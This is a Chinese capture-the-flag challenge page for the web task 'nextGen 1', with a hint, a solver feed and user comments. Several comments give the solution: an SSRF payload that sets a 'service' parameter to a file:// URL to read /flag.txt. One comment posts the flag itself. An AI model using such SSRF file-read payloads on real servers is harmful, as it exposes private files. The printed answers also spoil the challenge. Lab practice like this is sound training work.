nextGen 1WEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
L010
一血奖励:
0金币
解 决:
907
提 示:
Flag is in the `/flag.txt` file of the web server
描 述:
> Simple monitoring app.
评分(4)
解题动态

gusye 攻破了该题 15小时前

userBug 攻破了该题 1天前

snoway34 攻破了该题 1天前


wangif424 攻破了该题 2天前

神6107 攻破了该题 2天前

czg9000 攻破了该题 3天前

懒咩咩 攻破了该题 3天前

blii 攻破了该题 3天前

iictfii 攻破了该题 5天前

Deyudeyu 攻破了该题 6天前

ERINEY 攻破了该题 9天前

hurt6 攻破了该题 12天前

yerasd1 攻破了该题 12天前

CoderMonster 攻破了该题 13天前

21272111gu 攻破了该题 13天前

EvenFrank 攻破了该题 16天前

chen20 攻破了该题 17天前

huangxiyuan 攻破了该题 18天前

无122 攻破了该题 18天前

评论
Zhumeng 2月前
举报
简单的ssrf 通过网络抓包 会发送一个向request去发送一个post请求 提示说读取flag.txt 猜测是ssrf 有个这个 service=网址 这里可以把他换成 service=file://127.0.0.1/flag.txt 即可读取flag
红薯味橘子 4月前
举报
见作者:MiracleWolf的http://47.98.239.98/2023/11/18/ctf-webnextgen-1%e3%80%812/详解
小白帽来挖个漏洞 4月前
举报
题解:https://blog.csdn.net/guanrongl/article/details/142931716
差距从何而起 5月前
举报
shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf}
MOCHAOLIN 5月前
举报
POST /request HTTP/1.1 Host: 82.157.146.43:17387 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz
yun20231227 7月前
举报
改为POST请求 /request ?service=file:///flag.txt
我孤身一人 8月前
举报
环境貌似不行了
xiaoxiao972521 10月前
举报
service=file:////flag.txt
.⎛⎝•̀ω•́⎠⎞. 12月前
举报
属于典型的SSRF漏洞,利用file协议读取flag
meilanzhuju 1年前
举报
服务器到底是怎么处理这个service的?是展示这个service指向的url的内容?